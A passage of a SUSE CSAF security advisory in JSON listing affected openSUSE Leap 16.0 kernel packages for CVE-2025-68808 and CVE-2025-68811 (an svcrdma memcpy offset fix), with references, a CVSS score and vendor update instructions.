"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68808"
},
{
"cve": "CVE-2025-68811",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68811"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsvcrdma: use rc_pageoff for memcpy byte offset\n\nsvc_rdma_copy_inline_range added rc_curpage (page index) to the page\nbase instead of the byte offset rc_pageoff. Use rc_pageoff so copies\nland within the current page.\n\nFound by ZeroPath (https://zeropath.com)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68811",
"url": "https://www.suse.com/security/cve/CVE-2025-68811"
},
{
"category": "external",
"summary": "SUSE Bug 1256677 for CVE-2025-68811",
"url": "https://bugzilla.suse.com/1256677"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
